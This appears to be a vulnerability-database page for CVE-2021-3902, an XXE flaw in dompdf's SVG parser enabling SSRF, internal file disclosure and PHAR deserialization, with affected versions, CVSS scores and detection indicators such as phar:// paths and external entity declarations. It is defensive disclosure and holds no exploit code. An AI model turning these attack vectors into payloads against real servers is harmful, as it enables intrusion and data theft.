cbcvebase.
CVE-2021-3902
published 2024-11-15

CVE-2021-3902: An improper restriction of external entities (XXE) vulnerability in dompdf/dompdf's SVG parser allows for Server-Side Request Forgery (SSRF) and…

PriorityP356critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
0.92%
55.9th percentile
An improper restriction of external entities (XXE) vulnerability in dompdf/dompdf's SVG parser allows for Server-Side Request Forgery (SSRF) and deserialization attacks. This issue affects all versions prior to 2.0.0. The vulnerability can be exploited even if the isRemoteEnabled option is set to false. It allows attackers to perform SSRF, disclose internal image files, and cause PHAR deserialization attacks.

Affected

4 ranges
VendorProductVersion rangeFixed in
debianphp-dompdf< php-dompdf 2.0.2+dfsg-1 (bookworm)php-dompdf 2.0.2+dfsg-1 (bookworm)
dompdfdompdf>= 0 < 2.0.02.0.0
dompdfdompdf_dompdf>= unspecified < 2.0.02.0.0
dompdf_projectdompdf< 2.0.02.0.0

Detection & IOCsextracted from sources · hover to see the quote

  • The XXE vulnerability in dompdf's SVG parser can be exploited even when isRemoteEnabled is set to false — detection logic should not assume that disabling remote access mitigates the attack
  • Monitor for SSRF attempts originating from dompdf SVG parsing, including unexpected outbound HTTP/file requests triggered during PDF rendering
  • Monitor for PHAR deserialization attack patterns triggered via dompdf SVG parsing — look for phar:// stream wrapper usage in file paths passed to dompdf
  • Monitor for XXE payloads within SVG content submitted to dompdf, including external entity declarations referencing internal file paths or remote URLs
  • ·Setting isRemoteEnabled to false does NOT prevent exploitation of this vulnerability — the attack is possible regardless of this configuration option
  • ·All dompdf versions prior to 2.0.0 are affected; Debian-tracked fix is in version 2.0.2+dfsg-1 for bookworm/sid

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
osv9.8CRITICAL
vendor_debian9.8CRITICAL
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.